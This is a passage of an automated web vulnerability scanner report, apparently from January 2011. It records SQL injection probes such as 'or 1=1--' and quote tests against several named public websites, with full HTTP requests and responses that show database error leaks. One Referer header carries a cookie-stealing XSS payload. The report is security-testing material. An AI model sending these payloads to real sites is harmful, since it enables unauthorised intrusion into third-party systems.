<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<iframe id='a8c465c4' name='a8c465c4' src='http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=1522925385' frameborder='0' scrolling='no' width='728' height='90' allowtransparency='true'></iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
</div>
<div class="cl"> </div>
<div id="header">
<div id="navigation">
<ul>
<li><a class="resetmenu" href="#">things to do</a>
<div class="dropdown">
<div class="main-menu">
<ul class="col-3">
<li><a href="/ThingsToDo/Today">Today</a></li>
<li><a href="/ThingsToDo/ThisWeek">This Week</a></li>
<li><a href="#sub-menu-1thingstodo">All Things to Do</a></li>
<li><a href="#sub-menu-1movies">Movies</a></li>
<li><a href="#sub-menu-1justforkids">Just For Kids</a></li>
<li><a href="#sub-menu-1recreations">Fun & Recreation</a></li>
<li><a href="/chat">Chat Online</a></li>
<li><a href="/twitter">Explore Twitter</a></li>
<li><a href="/Online-Internet/Blogs">Visit Lebanese Blogs</a></li>
</ul>
</div>
<div id="sub-menu-1thingstodo" class="sub-menu">
<p class="main-btn" id="/ThingsToDo">All Things to Do <a href="#" class="return"></a></p>
<ul class="col-3">
<li><a href="/ThingsToDo/Exhibitions/6382333962">Exhibitions</a></li>
<li><a href="/ThingsToDo/Festivals/272910464">Festivals</a></li>
<li><a href="/ThingsToDo/Gatherings/9274143605">Gatherings</a></li>
<li><a href="/ThingsToDo/Live-Music/560568055">Live Music</a></li>
<li><a href="/ThingsToDo/Markets-and-Deals/0106299254">Markets & Deals</a></li>
<li><a href="/ThingsToDo/Parties/1690334">Parties</a></li>
<li><a href="/ThingsToDo/Performances/112730726">Performances</a></li>
<li><a href="/ThingsToDo/Screenings/60463877">Screenings</a></li>
<li><a href="/ThingsToDo/Seminars-and-Lectures/295390016">Seminars & Lectures</a></li>
<li><a href="/ThingsToDo/Theater/706796009">Theater</a></li>
<li><a href="/ThingsToDo/Workshops/7278901598">Workshops</a></li>
</ul></div><div id="sub-menu-1movies" class="sub-menu">
<p class="main-btn" id="/Movies">Movies <a href="#" class="return"></a></p>
<ul class=
...[SNIP]...

1.53. http://www.beirut.com/images/loaders/big/purple-ajax-loader.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.beirut.com
Path:	/images/loaders/big/purple-ajax-loader.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13824690'%20or%201%3d1--%20 and 13824690'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/loaders/big/purple-ajax-loader.gif13824690'%20or%201%3d1--%20 HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:27:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="stylesheet" href="/css/magenta-style.css" type="text/css" media="all" />
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>

<script type='text/javascript' src='/js/jquery-libraries.js'></script>
<script src="/js/jquery.google-analytics.js" type="text/javascript"></script>

<script type="text/javascript" src="/js/jquery.jcarousel.js"></script><script type="text/javascript">
$.trackPage('UA-12545632-3')
</script>
<script src="/js/fnc.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/css/magenta-jquery.autocomplete.css" />
</head>
<body >
<div id="wrapper">
<div id="shell">
<div id="site-top"> </div>
<div id="site-bg">
<div class="left">
<div id="logo"><a href="/"><img title="Beirut.com" alt="Beirut.com" src="/css/images/beirut_logo_beta.png" width="198" height="65"></a></div>
<div class="cl"> </div>
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript">
function fbConnect() {
   FB.init("98034c63917cb0c0c02f1b9429eaa593", "/xd_receiver.htm");
   FB.init("98034c63917cb0c0c02f1b9429eaa593");
}
fbConnect();
function reloader(){
   location.reload(true);
}
</script>
<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
<script type="text/javascript">
   //FB.XFBML.Host.parseDomTree();
   //FB.XFBML.parse();
   function draw_FB_Login(){

       var url = "fb-login.php"; // ajax url

       $.ajax({
       type: "POST",
       url:url,
       data: "out=yes",
       success: function(msg){
       }
       });

       var msg = '<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
...[SNIP]...

Request 2

GET /images/loaders/big/purple-ajax-loader.gif13824690'%20or%201%3d2--%20 HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:27:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="stylesheet" href="/css/green-style.css" type="text/css" media="all" />
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>

<script type='text/javascript' src='/js/jquery-libraries.js'></script>
<script src="/js/jquery.google-analytics.js" type="text/javascript"></script>

<script type="text/javascript" src="/js/jquery.jcarousel.js"></script><script type="text/javascript">
$.trackPage('UA-12545632-3')
</script>
<script src="/js/fnc.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="/css/green-jquery.autocomplete.css" />
</head>
<body >
<div id="wrapper">
<div id="shell">
<div id="site-top"> </div>
<div id="site-bg">
<div class="left">
<div id="logo"><a href="/"><img title="Beirut.com" alt="Beirut.com" src="/css/images/beirut_logo_beta.png" width="198" height="65"></a></div>
<div class="cl"> </div>
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript">
function fbConnect() {
   FB.init("98034c63917cb0c0c02f1b9429eaa593", "/xd_receiver.htm");
   FB.init("98034c63917cb0c0c02f1b9429eaa593");
}
fbConnect();
function reloader(){
   location.reload(true);
}
</script>
<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>
<script type="text/javascript">
   //FB.XFBML.Host.parseDomTree();
   //FB.XFBML.parse();
   function draw_FB_Login(){

       var url = "fb-login.php"; // ajax url

       $.ajax({
       type: "POST",
       url:url,
       data: "out=yes",
       success: function(msg){
       }
       });

       var msg = '<fb:login-button v="2" onlogin="update_user_box()" length="long" background="light" size="medium"></fb:login-button>';

...[SNIP]...

1.54. http://www.dominionenterprises.com/main/do/Privacy_Policy [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.dominionenterprises.com
Path:	/main/do/Privacy_Policy

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Privacy_Policy'%20and%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:11 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=9c634d66b48759ca834ca421efe5637e; expires=Thu, 27 Jan 2011 14:03:11 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:03:11 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Privacy Policy">
   <meta name="keywords" content="Privacy Policy">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">

   
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

   
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>

<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>

<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-setup.js"></script>

<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/swfobject.js"></script>

<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/slider.js"></script>


...[SNIP]...

Request 2

GET /main/do/Privacy_Policy'%20and%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:03:11 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=fc1d68d00efcab2fb213ab705761f75a; expires=Thu, 27 Jan 2011 14:03:11 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:03:11 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 775
Connection: close
Content-Type: text/html

<br />
<b>Notice</b>: Undefined index: parentID in <b>/usr/local/apache2/htdocs/www/site/dbo/PageTemplateField.php</b> on line <b>38</b><br />
<br />
<b>Notice</b>: Undefined property: templateName in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1069</b><br />
<br />
<b>Notice</b>: Undefined property: templateFileName in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1069</b><br />
<br />
<b>Notice</b>: Undefined property: templateCssHeader in <b>/usr/local/apache2/htdocs/www/site/classes/Page.class.php</b> on line <b>1285</b><br />
<br />
<b>Warning</b>: Smarty error: unable to read resource: "" in <b>/usr/local/apache2/htdocs/www/third_party/smarty/Smarty.class.php</b> on line <b>1083</b><br />

1.55. http://www.flashedition.com/publication [i parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.flashedition.com
Path:	/publication

Issue detail

The i parameter appears to be vulnerable to SQL injection attacks. The payloads 13661187%20or%201%3d1--%20 and 13661187%20or%201%3d2--%20 were each submitted in the i parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /publication?i=5316213661187%20or%201%3d1--%20 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=8ar88s2155addv5msvbctkoh35; expires=Tue, 25-Jan-2011 17:14:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=8ar88s2155addv5msvbctkoh35; expires=Wed, 25-Jan-2012 13:14:29 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:14:29 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 8481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<STYLE type=text/css>
#banner_btn
{
width: 10px;
height: 100%;
background-image:url(banner_btn.gif);
vertical-align: middle;
}

#banner_btn_hor
{
width: 100%;
height: 10px;
background-image:url(banner_btn_hor.gif);
}

#banner
{
overflow: hidden;
vertical-align: middle;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
#banner *
{
font-family: Lucida Grande, Segoe UI, Tahoma, sans-serif;
font-size: 12px;
color: #000000;
}
#banner a:link
{
color: #00688B;
text-decoration: none;
}
#banner a:visited
{
color: #00688B;
text-decoration: none;
}
#banner a:hover
{
color: #00688B;
text-decoration: underline;
}
#banner a:active
{
color: #00688B;
text-decoration: underline;
}
body {
margin: 0px;
padding: 0px;
}
#vert_text {
writing-mode: tb-rl;
filter: flipv fliph;
}
#logo_center_img
{
position: absolute;
margin: auto;
left: 0px;
top: 0px;
z-index: 100;
}

div.logo_center_img1
{
display:block;
position:absolute;
top:0;
left:0;
background:#ffffff;
z-index: -101;
width:100%;
height:100%;
}
</STYLE>

<title>brad pay test-DEL</title>
<script type="text/javascript" src="/js/s
...[SNIP]...

Request 2

GET /publication?i=5316213661187%20or%201%3d2--%20 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Length: 188
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<html>
<head>
<title>Publication Not Available</title>
</head>
<body>
<h1>Publication Not Available</h1>
<p> The publication you requested is not available </p>
</body>
</html>

1.56. http://www.flashedition.com/publication [m parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.flashedition.com
Path:	/publication

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payloads 16103717%20or%201%3d1--%20 and 16103717%20or%201%3d2--%20 were each submitted in the m parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /publication?m=1219116103717%20or%201%3d1--%20&l=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=sf7kaiktruee342efur467s290; expires=Tue, 25-Jan-2011 17:14:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=sf7kaiktruee342efur467s290; expires=Wed, 25-Jan-2012 13:14:29 GMT
Set-Cookie: ie_warn=1; expires=Wed, 25-Jan-2012 13:14:29 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 8486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<STYLE type=text/css>
#banner_btn
{
width: 10px;
height: 100%;
background-image:url(banner_btn.gif);
vertical-align: middle;
}

#banner_btn_hor
{
width: 100%;
height: 10px;
background-image:url(banner_btn_hor.gif);
}

#banner
{
overflow: hidden;
vertical-align: middle;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
#banner *
{
font-family: Lucida Grande, Segoe UI, Tahoma, sans-serif;
font-size: 12px;
color: #000000;
}
#banner a:link
{
color: #00688B;
text-decoration: none;
}
#banner a:visited
{
color: #00688B;
text-decoration: none;
}
#banner a:hover
{
color: #00688B;
text-decoration: underline;
}
#banner a:active
{
color: #00688B;
text-decoration: underline;
}
body {
margin: 0px;
padding: 0px;
}
#vert_text {
writing-mode: tb-rl;
filter: flipv fliph;
}
#logo_center_img
{
position: absolute;
margin: auto;
left: 0px;
top: 0px;
z-index: 100;
}

div.logo_center_img1
{
display:block;
position:absolute;
top:0;
left:0;
background:#ffffff;
z-index: -101;
width:100%;
height:100%;
}
</STYLE>

<title>brad pay test-DEL</title>
<script type="text/javascript" src="/js/s
...[SNIP]...

Request 2

GET /publication?m=1219116103717%20or%201%3d2--%20&l=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

1.57. http://www.forrent.com/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.forrent.com
Path:	/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 25 Jan 2011 00:02:42 GMT
Server: Apache
Set-Cookie: PHPSESSID=2v447h9l914bldd8unjud8f0u5; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Server-Id: W4
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:42 GMT
Server: Apache
Set-Cookie: PHPSESSID=cuu6a26mcq4h6cje48t55vq184; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: test_element_id=0; expires=Mon, 25-Apr-2011 00:02:42 GMT; path=/
X-Server-Id: W6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52499

<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head dir="ltr" lang="en-us" profile="http://purl.org/uF/2008/03/ http://purl.org/uF/hCard/1.0/ http://gmpg.org/xfn/11">
<meta http-equi
...[SNIP]...

1.58. http://www.kiteship.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kiteship.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2011-01-24'' at line 1</font>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:43:04 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.59. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kiteship.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:31 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = '2011-01-24'' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:41 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.60. http://www.linkagogo.com/go/AddNoPopup [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

Request 1

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:38 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27ewoY"
Last-Modified: Tue, 25 Jan 2011 04:42:39 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
